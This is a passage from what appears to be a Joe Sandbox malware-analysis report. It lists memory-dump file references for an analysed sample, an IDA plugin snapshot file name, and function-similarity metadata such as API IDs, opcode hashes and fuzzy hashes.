                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterInitialize$Leave
                                                                                      • String ID:
                                                                                      • API String ID: 713024617-0
                                                                                      • Opcode ID: 413b64f43a4498e80a7ebf28d2f15c42c1dfb307a3f0d837e82025553748bd65
                                                                                      • Instruction ID: 54b48515b7951935e912328e70b5ce04a96f11d205a88cd217b1b7ea5f8da2a6
                                                                                      • Opcode Fuzzy Hash: 413b64f43a4498e80a7ebf28d2f15c42c1dfb307a3f0d837e82025553748bd65
                                                                                      • Instruction Fuzzy Hash: B8F01D3640124AEFC7209F69ECC8F96B7ACFB5431AF500437E54693022D778E566CAA9